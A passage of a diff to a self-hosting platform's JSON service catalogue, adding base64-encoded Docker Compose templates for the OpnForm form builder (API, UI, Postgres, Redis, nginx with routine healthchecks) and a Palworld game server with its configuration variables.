UklWRVI6IHJlZGlzCiAgICAgIFNFU1NJT05fTElGRVRJTUU6IDEyMAogICAgICBNQUlMX01BSUxFUjogJyR7TUFJTF9NQUlMRVI6LWxvZ30nCiAgICAgIE1BSUxfSE9TVDogJyR7TUFJTF9IT1NUfScKICAgICAgTUFJTF9QT1JUOiAnJHtNQUlMX1BPUlR9JwogICAgICBNQUlMX1VTRVJOQU1FOiAnJHtNQUlMX1VTRVJOQU1FOi15b3VyQGVtYWlsLmNvbX0nCiAgICAgIE1BSUxfUEFTU1dPUkQ6ICcke01BSUxfUEFTU1dPUkR9JwogICAgICBNQUlMX0VOQ1JZUFRJT046ICcke01BSUxfRU5DUllQVElPTn0nCiAgICAgIE1BSUxfRlJPTV9BRERSRVNTOiAnJHtNQUlMX0ZST01fQUREUkVTUzoteW91ckBlbWFpbC5jb219JwogICAgICBNQUlMX0ZST01fTkFNRTogJyR7TUFJTF9GUk9NX05BTUU6LU9wbkZvcm19JwogICAgICBBV1NfQUNDRVNTX0tFWV9JRDogJyR7QVdTX0FDQ0VTU19LRVlfSUR9JwogICAgICBBV1NfU0VDUkVUX0FDQ0VTU19LRVk6ICcke0FXU19TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIEFXU19ERUZBVUxUX1JFR0lPTjogJyR7QVdTX0RFRkFVTFRfUkVHSU9OOi11cy1lYXN0LTF9JwogICAgICBBV1NfQlVDS0VUOiAnJHtBV1NfQlVDS0VUfScKICAgICAgT1BFTl9BSV9BUElfS0VZOiAnJHtPUEVOX0FJX0FQSV9LRVl9JwogICAgICBURUxFR1JBTV9CT1RfSUQ6ICcke1RFTEVHUkFNX0JPVF9JRH0nCiAgICAgIFRFTEVHUkFNX0JPVF9UT0tFTjogJyR7VEVMRUdSQU1fQk9UX1RPS0VOfScKICAgICAgUkVESVNfSE9TVDogcmVkaXMKICAgICAgUkVESVNfUEFTU1dPUkQ6ICcke1NFUlZJQ0VfUEFTU1dPUkRfNjRfUkVESVN9JwogICAgICBEQl9IT1NUOiBwb3N0Z3Jlc3FsCiAgICAgIERCX0RBVEFCQVNFOiAnJHtQT1NUR1JFU1FMX0RBVEFCQVNFOi1vcG5mb3JtfScKICAgICAgREJfVVNFUk5BTUU6ICcke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU1FMfScKICAgICAgREJfUEFTU1dPUkQ6ICcke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVNRTH0nCiAgICAgIERCX0NPTk5FQ1RJT046IHBnc3FsCiAgICAgIFBIUF9NRU1PUllfTElNSVQ6IDFHCiAgICAgIFBIUF9NQVhfRVhFQ1VUSU9OX1RJTUU6ICc2MDAnCiAgICAgIFBIUF9VUExPQURfTUFYX0ZJTEVTSVpFOiA2NE0KICAgICAgUEhQX1BPU1RfTUFYX1NJWkU6IDY0TQogICAgY29tbWFuZDoKICAgICAgLSBwaHAKICAgICAgLSBhcnRpc2FuCiAgICAgIC0gJ3NjaGVkdWxlOndvcmsnCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3Jlc3FsOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BocCAvdXNyL3NoYXJlL25naW54L2h0bWwvYXJ0aXNhbiBhcHA6c2NoZWR1bGVyLXN0YXR1cyAtLW1vZGU9Y2hlY2sgLS1tYXgtbWludXRlcz0zIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDYwcwogICAgICB0aW1lb3V0OiAzMHMKICAgICAgcmV0cmllczogMwogICAgICBzdGFydF9wZXJpb2Q6IDcwcwogIG9wbmZvcm0tdWk6CiAgICBpbWFnZTogJ2podW1hbmovb3BuZm9ybS1jbGllbnQ6MS4xMi4xJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gTlVYVF9QVUJMSUNfQVBQX1VSTD0vCiAgICAgIC0gTlVYVF9QVUJMSUNfQVBJX0JBU0U9L2FwaQogICAgICAtICdOVVhUX1BSSVZBVEVfQVBJX0JBU0U9aHR0cDovL25naW54L2FwaScKICAgICAgLSBOVVhUX1BVQkxJQ19FTlY9cHJvZHVjdGlvbgogICAgICAtICdOVVhUX1BVQkxJQ19IX0NBUFRDSEFfU0lURV9LRVk9JHtIX0NBUFRDSEFfU0lURV9LRVl9JwogICAgICAtICdOVVhUX1BVQkxJQ19SRV9DQVBUQ0hBX1NJVEVfS0VZPSR7UkVfQ0FQVENIQV9TSVRFX0tFWX0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLS1zcGlkZXIgLXEgaHR0cDovL29wbmZvcm0tdWk6MzAwMC9sb2dpbiB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMKICAgICAgc3RhcnRfcGVyaW9kOiA0NXMKICAgIGRlcGVuZHNfb246CiAgICAgIG9wbmZvcm0tYXBpOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgcG9zdGdyZXNxbDoKICAgIGltYWdlOiAncG9zdGdyZXM6MTYnCiAgICB2b2x1bWVzOgogICAgICAtICdvcG5mb3JtLXBvc3RncmVzcWwtZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU1FMfScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTUUx9JwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTUUxfREFUQUJBU0U6LW9wbmZvcm19JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczo3JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1JFRElTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF82NF9SRURJU30nCiAgICB2b2x1bWVzOgogICAgICAtICdyZWRpcy1kYXRhOi9kYXRhJwogICAgY29tbWFuZDoKICAgICAgLSByZWRpcy1zZXJ2ZXIKICAgICAgLSAnLS1yZXF1aXJlcGFzcycKICAgICAgLSAnJHtTRVJWSUNFX1BBU1NXT1JEXzY0X1JFRElTfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSByZWRpcy1jbGkKICAgICAgICAtICctYScKICAgICAgICAtICcke1NFUlZJQ0VfUEFTU1dPUkRfNjRfUkVESVN9JwogICAgICAgIC0gUElORwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDMwcwogICAgICByZXRyaWVzOiAzCiAgbmdpbng6CiAgICBpbWFnZTogJ25naW54OjEuMjkuMicKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX05HSU5YCiAgICB2b2x1bWVzOgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9uZ2lueC9uZ2lueC5jb25mCiAgICAgICAgdGFyZ2V0OiAvZXRjL25naW54L2NvbmYuZC9kZWZhdWx0LmNvbmYKICAgICAgICByZWFkX29ubHk6IHRydWUKICAgICAgICBjb250ZW50OiAibWFwICRvcmlnaW5hbF91cmkgJGFwaV91cmkge1xuICAgIH5eL2FwaSgvLiokKSAkMTtcbiAgICBkZWZhdWx0ICRvcmlnaW5hbF91cmk7XG59XG5cbnNlcnZlciB7XG4gICAgbGlzdGVuIDgwIGRlZmF1bHRfc2VydmVyO1xuICAgIHJvb3QgL3Vzci9zaGFyZS9uZ2lueC9odG1sL3B1YmxpYztcblxuICAgIGFjY2Vzc19sb2cgL2Rldi9zdGRvdXQ7XG4gICAgZXJyb3JfbG9nIC9kZXYvc3RkZXJyIGVycm9yO1xuXG4gICAgaW5kZXggaW5kZXguaHRtbCBpbmRleC5odG0gaW5kZXgucGhwO1xuXG4gICAgbG9jYXRpb24gLyB7XG4gICAgICAgIHByb3h5X2h0dHBfdmVyc2lvbiAxLjE7XG4gICAgICAgIHByb3h5X3Bhc3MgaHR0cDovL29wbmZvcm0tdWk6MzAwMDtcbiAgICAgICAgcHJveHlfc2V0X2hlYWRlciBYLVJlYWwtSVAgJHJlbW90ZV9hZGRyO1xuICAgICAgICBwcm94eV9zZXRfaGVhZGVyIFgtRm9yd2FyZGVkLUhvc3QgJGhvc3Q7XG4gICAgICAgIHByb3h5X3NldF9oZWFkZXIgWC1Gb3J3YXJkZWQtUG9ydCAkc2VydmVyX3BvcnQ7XG4gICAgICAgIHByb3h5X3NldF9oZWFkZXIgVXBncmFkZSAkaHR0cF91cGdyYWRlO1xuICAgICAgICBwcm94eV9zZXRfaGVhZGVyIENvbm5lY3Rpb24gXCJVcGdyYWRlXCI7XG4gICAgfVxuXG4gICAgbG9jYXRpb24gfi8oYXBpfG9wZW58bG9jYWxcXC90ZW1wfGZvcm1zXFwvYXNzZXRzKS8ge1xuICAgICAgICBzZXQgJG9yaWdpbmFsX3VyaSAkdXJpO1xuICAgICAgICB0cnlfZmlsZXMgJHVyaSAkdXJpLyAvaW5kZXgucGhwJGlzX2FyZ3MkYXJncztcbiAgICB9XG5cbiAgICBsb2NhdGlvbiB+IFxcLnBocCQge1xuICAgICAgICBmYXN0Y2dpX3NwbGl0X3BhdGhfaW5mbyBeKC4rXFwucGhwKSgvLispJDtcbiAgICAgICAgZmFzdGNnaV9wYXNzIG9wbmZvcm0tYXBpOjkwMDA7XG4gICAgICAgIGZhc3RjZ2lfaW5kZXggaW5kZXgucGhwO1xuICAgICAgICBpbmNsdWRlIGZhc3RjZ2lfcGFyYW1zO1xuICAgICAgICBmYXN0Y2dpX3BhcmFtIFNDUklQVF9GSUxFTkFNRSAvdXNyL3NoYXJlL25naW54L2h0bWwvcHVibGljL2luZGV4LnBocDtcbiAgICAgICAgZmFzdGNnaV9wYXJhbSBSRVFVRVNUX1VSSSAkYXBpX3VyaTtcbiAgICB9XG59IgogICAgZGVwZW5kc19vbjoKICAgICAgLSBvcG5mb3JtLWFwaQogICAgICAtIG9wbmZvcm0tdWkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBuZ2lueAogICAgICAgIC0gJy10JwogICAgICBpbnRlcnZhbDogMzBzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAzCiAgICAgIHN0YXJ0X3BlcmlvZDogNDBzCg==", + "tags": [ + "opnform", + "form", + "survey", + "cloud", + "open-source", + "self-hosted", + "docker", + "no-code", + "embeddable" + ], + "category": null, + "logo": "svg/opnform.svg", + "minversion": "0.0.0", + "port": "80" + }, "orangehrm": { "documentation": "https://starterhelp.orangehrm.com/hc/en-us?utm_source=coolify.io", "slogan": "OrangeHRM open source HR management software.", @@ -3145,6 +3179,15 @@ "minversion": "0.0.0", "port": "3000" }, + "palworld": { + "documentation": "https://coolify.io/docs", + "slogan": "Palworld.yaml", + "compose": "c2VydmljZXM6CiAgcGFsd29ybGQ6CiAgICBpbWFnZTogJ3RoaWpzdmFubG9lZi9wYWx3b3JsZC1zZXJ2ZXItZG9ja2VyOnYxLjQuNicKICAgIHN0b3BfZ3JhY2VfcGVyaW9kOiAzMHMKICAgIHBvcnRzOgogICAgICAtICc4MjExOjgyMTEvdWRwJwogICAgICAtICcyNzAxNToyNzAxNS91ZHAnCiAgICB2b2x1bWVzOgogICAgICAtICdwYWx3b3JsZC1kYXRhOi9wYWx3b3JsZC8nCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnVFo9JHtUWjo/VVRDfScKICAgICAgLSAnUFVJRD0ke1BVSUQ6PzEwMDB9JwogICAgICAtICdQR0lEPSR7UEdJRDo/MTAwMH0nCiAgICAgIC0gJ01VTFRJVEhSRUFESU5HPSR7TVVMVElUSFJFQURJTkc6P2ZhbHNlfScKICAgICAgLSAnTUFYX1BMQVlFUlM9JHtQTEFZRVJTOj8xNn0nCiAgICAgIC0gJ1NFUlZFUl9OQU1FPSR7U0VSVkVSX05BTUU6P3BhbHdvcmxkLXNlcnZlci1kb2NrZXIgYnkgVGhpanMgdmFuIExvZWYgdmlhIENvb2xpZnl9JwogICAgICAtICdTRVJWRVJfREVTQ1JJUFRJT049JHtTRVJWRVJfREVTQ1JJUFRJT046P3BhbHdvcmxkLXNlcnZlci1kb2NrZXIgYnkgVGhpanMgdmFuIExvZWYgdmlhIENvb2xpZnl9JwogICAgICAtICdTRVJWRVJfUEFTU1dPUkQ9JHtTRVJWRVJfUEFTU1dPUkQ6P3dvcmxkb2ZwYWxzfScKICAgICAgLSAnQURNSU5fUEFTU1dPUkQ9JHtBRE1JTl9QQVNTV09SRDotYWRtaW5QYXNzd29yZH0nCiAgICAgIC0gJ0NPTU1VTklUWT0ke0NPTU1VTklUWTo/ZmFsc2V9JwogICAgICAtICdQVUJMSUNfSVA9JHtQVUJMSUNfSVA6LX0nCiAgICAgIC0gJ1BVQkxJQ19QT1JUPSR7UFVCTElDX1BPUlQ6PzgyMTF9JwogICAgICAtICdQT1JUPSR7UE9SVDo/ODIxMX0nCiAgICAgIC0gJ1FVRVJZX1BPUlQ9JHtRVUVSWV9QT1JUOj8yNzAxNX0nCiAgICAgIC0gJ1VQREFURV9PTl9CT09UPSR7VVBEQVRFX09OX0JPT1Q6P3RydWV9JwogICAgICAtICdSQ09OX0VOQUJMRUQ9JHtSQ09OX0VOQUJMRUQ6P3RydWV9JwogICAgICAtICdSQ09OX1BPUlQ9JHtSQ09OX1BPUlQ6PzI1NTc1fScKICAgICAgLSAnQkFDS1VQX0VOQUJMRUQ9JHtCQUNLVVBfRU5BQkxFRDo/dHJ1ZX0nCiAgICAgIC0gJ0RFTEVURV9PTERfQkFDS1VQUz0ke0RFTEVURV9PTERfQkFDS1VQUzo/ZmFsc2V9JwogICAgICAtICdPTERfQkFDS1VQX0RBWVM9JHtPTERfQkFDS1VQX0RBWVM6PzMwfScKICAgICAgLSAnQkFDS1VQX0NST05fRVhQUkVTU0lPTj0ke0JBQ0tVUF9DUk9OX0VYUFJFU1NJT046PzAgMCAqICogKn0nCiAgICAgIC0gJ0FVVE9fVVBEQVRFX0VOQUJMRUQ9JHtBVVRPX1VQREFURV9FTkFCTEVEOj9mYWxzZX0nCiAgICAgIC0gJ0FVVE9fVVBEQVRFX0NST05fRVhQUkVTU0lPTj0ke0FVVE9fVVBEQVRFX0NST05fRVhQUkVTU0lPTjo/MCAqICogKiAqfScKICAgICAgLSAnQVVUT19VUERBVEVfV0FSTl9NSU5VVEVTPSR7QVVUT19VUERBVEVfV0FSTl9NSU5VVEVTOj8zMH0nCiAgICAgIC0gJ0FVVE9fUkVCT09UX0VOQUJMRUQ9JHtBVVRPX1JFQk9PVF9FTkFCTEVEOj9mYWxzZX0nCiAgICAgIC0gJ0FVVE9fUkVCT09UX0VWRU5fSUZfUExBWUVSU19PTkxJTkU9JHtBVVRPX1JFQk9PVF9FVkVOX0lGX1BMQVlFUlNfT05MSU5FOj9mYWxzZX0nCiAgICAgIC0gJ0FVVE9fUkVCT09UX1dBUk5fTUlOVVRFUz0ke0FVVE9fUkVCT09UX1dBUk5fTUlOVVRFUzo/NX0nCiAgICAgIC0gJ0FVVE9fUkVCT09UX0NST05fRVhQUkVTU0lPTj0ke0FVVE9fUkVCT09UX0NST05fRVhQUkVTU0lPTjo/MCAwICogKiAqfScKICAgICAgLSAnQVVUT19QQVVTRV9FTkFCTEVEPSR7QVVUT19QQVVTRV9FTkFCTEVEOj9mYWxzZX0nCiAgICAgIC0gJ0FVVE9fUEFVU0VfVElNRU9VVF9FU1Q9JHtBVVRPX1BBVVNFX1RJTUVPVVRfRVNUOj8xODB9JwogICAgICAtICdBVVRPX1BBVVNFX0xPRz0ke0FVVE9fUEFVU0VfTE9HOj90cnVlfScKICAgICAgLSAnQVVUT19QQVVTRV9ERUJVRz0ke0FVVE9fUEFVU0VfREVCVUc6P2ZhbHNlfScKICAgICAgLSAnRU5BQkxFX1BMQVlFUl9MT0dHSU5HPSR7RU5BQkxFX1BMQVlFUl9MT0dHSU5HOj90cnVlfScKICAgICAgLSAnUExBWUVSX0xPR0dJTkdfUE9MTF9QRVJJT0Q9JHtQTEFZRVJfTE9HR0lOR19QT0xMX1BFUklPRDo/NX0nCiAgICAgIC0gJ0RJRkZJQ1VMVFk9JHtESUZGSUNVTFRZOj9Ob25lfScKICAgICAgLSAnUkFORE9NSVpFUl9UWVBFPSR7UkFORE9NSVpFUl9UWVBFOi19JwogICAgICAtICdSQU5ET01JWkVSX1NFRUQ9JHtSQU5ET01JWkVSX1NFRUQ6P25vbmV9JwogICAgICAtICdEQVlUSU1FX1NQRUVEUkFURT0ke0RBWVRJTUVfU1BFRURSQVRFOj8xLjAwMDAwMH0nCiAgICAgIC0gJ05JR0hUVElNRV9TUEVFRFJBVEU9JHtOSUdIVFRJTUVfU1BFRURSQVRFOj8xLjAwMDAwMH0nCiAgICAgIC0gJ0VYUF9SQVRFPSR7RVhQX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnUEFMX0NBUFRVUkVfUkFURT0ke1BBTF9DQVBUVVJFX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnUEFMX1NQQVdOX05VTV9SQVRFPSR7UEFMX1NQQVdOX05VTV9SQVRFOj8xLjAwMDAwMH0nCiAgICAgIC0gJ1BBTF9EQU1BR0VfUkFURV9BVFRBQ0s9JHtQQUxfREFNQUdFX1JBVEVfQVRUQUNLOj8xLjAwMDAwMH0nCiAgICAgIC0gJ1BBTF9EQU1BR0VfUkFURV9ERUZFTlNFPSR7UEFMX0RBTUFHRV9SQVRFX0RFRkVOU0U6PzEuMDAwMDAwfScKICAgICAgLSAnUExBWUVSX0RBTUFHRV9SQVRFX0FUVEFDSz0ke1BMQVlFUl9EQU1BR0VfUkFURV9BVFRBQ0s6PzEuMDAwMDAwfScKICAgICAgLSAnUExBWUVSX0RBTUFHRV9SQVRFX0RFRkVOU0U9JHtQTEFZRVJfREFNQUdFX1JBVEVfREVGRU5TRTo/MS4wMDAwMDB9JwogICAgICAtICdQTEFZRVJfU1RPTUFDSF9ERUNSRUFTRV9SQVRFPSR7UExBWUVSX1NUT01BQ0hfREVDUkVBU0VfUkFURTo/MS4wMDAwMDB9JwogICAgICAtICdQTEFZRVJfU1RBTUlOQV9ERUNSRUFTRV9SQVRFPSR7UExBWUVSX1NUQU1JTkFfREVDUkVBU0VfUkFURTo/MS4wMDAwMDB9JwogICAgICAtICdQTEFZRVJfQVVUT19IUF9SRUdFTl9SQVRFPSR7UExBWUVSX0FVVE9fSFBfUkVHRU5fUkFURTo/MS4wMDAwMDB9JwogICAgICAtICdQTEFZRVJfQVVUT19IUF9SRUdFTl9SQVRFX0lOX1NMRUVQPSR7UExBWUVSX0FVVE9fSFBfUkVHRU5fUkFURV9JTl9TTEVFUDo/MS4wMDAwMDB9JwogICAgICAtICdQQUxfU1RPTUFDSF9ERUNSRUFTRV9SQVRFPSR7UEFMX1NUT01BQ0hfREVDUkVBU0VfUkFURTo/MS4wMDAwMDB9JwogICAgICAtICdQQUxfU1RBTUlOQV9ERUNSRUFTRV9SQVRFPSR7UEFMX1NUQU1JTkFfREVDUkVBU0VfUkFURTo/MS4wMDAwMDB9JwogICAgICAtICdQQUxfQVVUT19IUF9SRUdFTl9SQVRFPSR7UEFMX0FVVE9fSFBfUkVHRU5fUkFURTo/MS4wMDAwMDB9JwogICAgICAtICdQQUxfQVVUT19IUF9SRUdFTl9SQVRFX0lOX1NMRUVQPSR7UEFMX0FVVE9fSFBfUkVHRU5fUkFURV9JTl9TTEVFUDo/MS4wMDAwMDB9JwogICAgICAtICdCVUlMRF9PQkpFQ1RfSFBfUkFURT0ke0JVSUxEX09CSkVDVF9IUF9SQVRFOj8xLjAwMDAwMH0nCiAgICAgIC0gJ0JVSUxEX09CSkVDVF9EQU1BR0VfUkFURT0ke0JVSUxEX09CSkVDVF9EQU1BR0VfUkFURTo/MS4wMDAwMDB9JwogICAgICAtICdCVUlMRF9PQkpFQ1RfREVURVJJT1JBVElPTl9EQU1BR0VfUkFURT0ke0JVSUxEX09CSkVDVF9ERVRFUklPUkFUSU9OX0RBTUFHRV9SQVRFOj8xLjAwMDAwMH0nCiAgICAgIC0gJ0NPTExFQ1RJT05fRFJPUF9SQVRFPSR7Q09MTEVDVElPTl9EUk9QX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnQ09MTEVDVElPTl9PQkpFQ1RfSFBfUkFURT0ke0NPTExFQ1RJT05fT0JKRUNUX0hQX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnQ09MTEVDVElPTl9PQkpFQ1RfUkVTUEFXTl9TUEVFRF9SQVRFPSR7Q09MTEVDVElPTl9PQkpFQ1RfUkVTUEFXTl9TUEVFRF9SQVRFOj8xLjAwMDAwMH0nCiAgICAgIC0gJ0VORU1ZX0RST1BfSVRFTV9SQVRFPSR7RU5FTVlfRFJPUF9JVEVNX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnREVBVEhfUEVOQUxUWT0ke0RFQVRIX1BFTkFMVFk6P0FsbH0nCiAgICAgIC0gJ0VOQUJMRV9QTEFZRVJfVE9fUExBWUVSX0RBTUFHRT0ke0VOQUJMRV9QTEFZRVJfVE9fUExBWUVSX0RBTUFHRTo/RmFsc2V9JwogICAgICAtICdFTkFCTEVfRlJJRU5ETFlfRklSRT0ke0VOQUJMRV9GUklFTkRMWV9GSVJFOj9GYWxzZX0nCiAgICAgIC0gJ0VOQUJMRV9JTlZBREVSX0VORU1ZPSR7RU5BQkxFX0lOVkFERVJfRU5FTVk6P1RydWV9JwogICAgICAtICdBQ1RJVkVfVU5LTz0ke0FDVElWRV9VTktPOj9GYWxzZX0nCiAgICAgIC0gJ0VOQUJMRV9BSU1fQVNTSVNUX1BBRD0ke0VOQUJMRV9BSU1fQVNTSVNUX1BBRDo/VHJ1ZX0nCiAgICAgIC0gJ0VOQUJMRV9BSU1fQVNTSVNUX0tFWUJPQVJEPSR7RU5BQkxFX0FJTV9BU1NJU1RfS0VZQk9BUkQ6P0ZhbHNlfScKICAgICAgLSAnRFJPUF9JVEVNX01BWF9OVU09JHtEUk9QX0lURU1fTUFYX05VTTo/MzAwMH0nCiAgICAgIC0gJ0RST1BfSVRFTV9NQVhfTlVNX1VOS089JHtEUk9QX0lURU1fTUFYX05VTV9VTktPOj8xMDB9JwogICAgICAtICdCQVNFX0NBTVBfTUFYX05VTT0ke0JBU0VfQ0FNUF9NQVhfTlVNOj8xMjh9JwogICAgICAtICdCQVNFX0NBTVBfV09SS0VSX01BWF9OVU09JHtCQVNFX0NBTVBfV09SS0VSX01BWF9OVU06PzE1fScKICAgICAgLSAnRFJPUF9JVEVNX0FMSVZFX01BWF9IT1VSUz0ke0RST1BfSVRFTV9BTElWRV9NQVhfSE9VUlM6PzEuMDAwMDAwfScKICAgICAgLSAnQVVUT19SRVNFVF9HVUlMRF9OT19PTkxJTkVfUExBWUVSUz0ke0FVVE9fUkVTRVRfR1VJTERfTk9fT05MSU5FX1BMQVlFUlM6P0ZhbHNlfScKICAgICAgLSAnQVVUT19SRVNFVF9HVUlMRF9USU1FX05PX09OTElORV9QTEFZRVJTPSR7QVVUT19SRVNFVF9HVUlMRF9USU1FX05PX09OTElORV9QTEFZRVJTOj83Mi4wMDAwMDB9JwogICAgICAtICdHVUlMRF9QTEFZRVJfTUFYX05VTT0ke0dVSUxEX1BMQVlFUl9NQVhfTlVNOj8yMH0nCiAgICAgIC0gJ0JBU0VfQ0FNUF9NQVhfTlVNX0lOX0dVSUxEPSR7QkFTRV9DQU1QX01BWF9OVU1fSU5fR1VJTEQ6PzR9JwogICAgICAtICdQQUxfRUdHX0RFRkFVTFRfSEFUQ0hJTkdfVElNRT0ke1BBTF9FR0dfREVGQVVMVF9IQVRDSElOR19USU1FOj83Mi4wMDAwMDB9JwogICAgICAtICdXT1JLX1NQRUVEX1JBVEU9JHtXT1JLX1NQRUVEX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnQVVUT19TQVZFX1NQQU49JHtBVVRPX1NBVkVfU1BBTjo/MzAuMDAwMDAwfScKICAgICAgLSAnSVNfTVVMVElQTEFZPSR7SVNfTVVMVElQTEFZOj9GYWxzZX0nCiAgICAgIC0gJ0lTX1BWUD0ke0lTX1BWUDo/RmFsc2V9JwogICAgICAtICdIQVJEQ09SRT0ke0hBUkRDT1JFOj9GYWxzZX0nCiAgICAgIC0gJ1BBTF9MT1NUPSR7UEFMX0xPU1Q6P0ZhbHNlfScKICAgICAgLSAnQ0FOX1BJQ0tVUF9PVEhFUl9HVUlMRF9ERUFUSF9QRU5BTFRZX0RST1A9JHtDQU5fUElDS1VQX09USEVSX0dVSUxEX0RFQVRIX1BFTkFMVFlfRFJPUDo/RmFsc2V9JwogICAgICAtICdFTkFCTEVfTk9OX0xPR0lOX1BFTkFMVFk9JHtFTkFCTEVfTk9OX0xPR0lOX1BFTkFMVFk6P1RydWV9JwogICAgICAtICdFTkFCTEVfRkFTVF9UUkFWRUw9JHtFTkFCTEVfRkFTVF9UUkFWRUw6P1RydWV9JwogICAgICAtICdJU19TVEFSVF9MT0NBVElPTl9TRUxFQ1RfQllfTUFQPSR7SVNfU1RBUlRfTE9DQVRJT05fU0VMRUNUX0JZX01BUDo/VHJ1ZX0nCiAgICAgIC0gJ0VYSVNUX1BMQVlFUl9BRlRFUl9MT0dPVVQ9JHtFWElTVF9QTEFZRVJfQUZURVJfTE9HT1VUOj9GYWxzZX0nCiAgICAgIC0gJ0VOQUJMRV9ERUZFTlNFX09USEVSX0dVSUxEX1BMQVlFUj0ke0VOQUJMRV9ERUZFTlNFX09USEVSX0dVSUxEX1BMQVlFUjo/RmFsc2V9JwogICAgICAtICdJTlZJU0lCTEVfT1RIRVJfR1VJTERfQkFTRV9DQU1QX0FSRUFfRlg9JHtJTlZJU0lCTEVfT1RIRVJfR1VJTERfQkFTRV9DQU1QX0FSRUFfRlg6P0ZhbHNlfScKICAgICAgLSAnQlVJTERfQVJFQV9MSU1JVD0ke0JVSUxEX0FSRUFfTElNSVQ6P0ZhbHNlfScKICAgICAgLSAnSVRFTV9XRUlHSFRfUkFURT0ke0lURU1fV0VJR0hUX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnQ09PUF9QTEFZRVJfTUFYX05VTT0ke0NPT1BfUExBWUVSX01BWF9OVU06PzR9JwogICAgICAtICdSRUdJT049JHtSRUdJT046LX0nCiAgICAgIC0gJ1VTRUFVVEg9JHtVU0VBVVRIOj9UcnVlfScKICAgICAgLSAnQkFOX0xJU1RfVVJMPSR7QkFOX0xJU1RfVVJMOj9odHRwczovL2FwaS5wYWx3b3JsZGdhbWUuY29tL2FwaS9iYW5saXN0LnR4dH0nCiAgICAgIC0gJ1JFU1RfQVBJX0VOQUJMRUQ9JHtSRVNUX0FQSV9FTkFCTEVEOj9GYWxzZX0nCiAgICAgIC0gJ1JFU1RfQVBJX1BPUlQ9JHtSRVNUX0FQSV9QT1JUOj84MjEyfScKICAgICAgLSAnU0hPV19QTEFZRVJfTElTVD0ke1NIT1dfUExBWUVSX0xJU1Q6P1RydWV9JwogICAgICAtICdFTkFCTEVfUFJFREFUT1JfQk9TU19QQUw9JHtFTkFCTEVfUFJFREFUT1JfQk9TU19QQUw6P1RydWV9JwogICAgICAtICdNQVhfQlVJTERJTkdfTElNSVRfTlVNPSR7TUFYX0JVSUxESU5HX0xJTUlUX05VTTo/MH0nCiAgICAgIC0gJ1NFUlZFUl9SRVBMSUNBVEVfUEFXTl9DVUxMX0RJU1RBTkNFPSR7U0VSVkVSX1JFUExJQ0FURV9QQVdOX0NVTExfRElTVEFOQ0U6PzE1MDAwLjAwMDAwMH0nCiAgICAgIC0gJ1NFUlZFUl9SRVBMSUNBVEVfUEFXTl9DVUxMX0RJU1RBTkNFX0lOX0JBU0VfQ0FNUD0ke1NFUlZFUl9SRVBMSUNBVEVfUEFXTl9DVUxMX0RJU1RBTkNFX0lOX0JBU0VfQ0FNUDo/NTAwMC4wMDAwMDB9JwogICAgICAtICdDUk9TU1BMQVlfUExBVEZPUk1TPSR7Q1JPU1NQTEFZX1BMQVRGT1JNUzo/KFN0ZWFtLFhib3gsUFM1LE1hYyl9JwogICAgICAtICdVU0VfQkFDS1VQX1NBVkVfREFUQT0ke1VTRV9CQUNLVVBfU0FWRV9EQVRBOj9UcnVlfScKICAgICAgLSAnVVNFX0RFUE9UX0RPV05MT0FERVI9JHtVU0VfREVQT1RfRE9XTkxPQURFUjo/RmFsc2V9JwogICAgICAtICdJTlNUQUxMX0JFVEFfSU5TSURFUj0ke0lOU1RBTExfQkVUQV9JTlNJREVSOj9GYWxzZX0nCiAgICAgIC0gJ0FMTE9XX0dMT0JBTF9QQUxCT1hfRVhQT1JUPSR7QUxMT1df